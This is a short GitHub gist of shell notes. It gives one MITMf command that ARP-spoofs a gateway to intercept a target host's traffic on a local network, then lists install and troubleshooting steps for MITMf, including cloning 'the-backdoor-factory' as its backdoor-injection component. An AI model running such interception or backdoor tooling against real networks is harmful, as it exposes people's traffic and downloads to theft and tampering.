Skip to content

Instantly share code, notes, and snippets.

@boy3vil
Created September 24, 2019 03:29
Show Gist options
  • Save boy3vil/766458e2b905342e361e6f9131a34566 to your computer and use it in GitHub Desktop.
Save boy3vil/766458e2b905342e361e6f9131a34566 to your computer and use it in GitHub Desktop.
mitmf --arp --spoof --gateway 192.168.100.1 --target 192.168.100.100 -i wlan0
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive
pip install -r requirements.txt
(if error pip)
sudo apt-get install python-setuptools
sudo apt-get install python-dev
sudo apt install python-pip
(if error bdfactory)
git clone https://github.com/secretsquirrel/the-backdoor-factory backdoor
mkdir /usr/share/mitmf/bdfactory
cd backdoor
cp -r ./* /usr/share/mitmf/bdfactory/
cd /usr/share/mitmf/bdfactory
(if error "pcap.h not found")
sudo apt-get update
sudo apt-get install libpcap0.8-dev
(if error "'x86_64-linux-gnu-gcc' failed with exit status 1")
apt-get install libnfnetlink-dev
sudo apt install libnetfilter-queue-dev
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment